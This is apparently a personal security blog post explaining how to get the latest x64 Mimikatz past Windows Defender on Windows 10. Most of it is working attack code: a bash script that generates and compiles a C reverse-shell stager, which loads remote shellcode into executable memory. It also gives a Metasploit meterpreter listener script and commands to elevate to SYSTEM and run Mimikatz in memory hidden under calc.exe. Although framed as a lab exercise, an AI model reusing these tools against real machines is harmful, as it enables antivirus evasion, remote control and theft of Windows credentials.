Running latest x64 Mimikatz on Windows 10

I have been keeping this journal for 7 years now and I guess this is a reason to add some  interesting stuff (lately I have been busy in the compiler world on various architectures and different developer boards)

Here is a short little exercise for this evening -> getting the latest mimikatz running on a Windows 10 machine (build 10.0.16299.192) with all latest updates and Windows Defender protecting.

Microsoft has gotten really good in detecting all sorts of techniques and even a good custom ps1 mimikatz script that I have used a lot in the past gets flagged now

This customized method does not work anymore https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/

So I have played a little with my other generator scripts and came up with the following which is always reliable, all that I had to do is make it produce 64bit PE32+ executable and load the listener for 64bit reverse shell.

Here are my scripts and steps :  (make sure you have the mingw-w64 )

ii binutils-mingw-w64-x86-64 2.26-3ubuntu1+6.6 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64-x86-64-dev 4.0.4-2 all Development files for MinGW-w64 targeting Win64
#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

This will generate a loader called payload.exe which you can execute on the Windows 10 lab machine (I have used runs admin to be able to inject latest 64bit mimikatz.exe to memory from the spawned reverse shell)

My listener on the attacking machine running Metasploit is as follows:

#!/bin/bash
clear
echo "***************************************************************"
echo "    X86-64 meterpreter reverse tcp listener loader             "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

So run the above script from your metasploit directory and execute the payload.exe on the test machine.

Once you get the reverse shell connected

Run getsystem to elevate to NT AUTHORITY/SYSTEM and execute latest 64bit mimikatz.exe

Mimikatz 2.1.1-20180127   https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180127

Download, extract and copy over the x64/mimikatz.exe to your metasploit root directory, then execute it via the following command

meterpreter > execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe

You get the latest mimikatz running with all the new interesting  features added … DCShadow ….

Of course we can have some fun with DPAPI stuff in windows ( as described here https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials )

Update 02-May-2018 Windows 10  1803

Advertisement

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

1 Response to Running latest x64 Mimikatz on Windows 10

  1. anguson says:

    You sir, are a true magician. Hats off to you.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.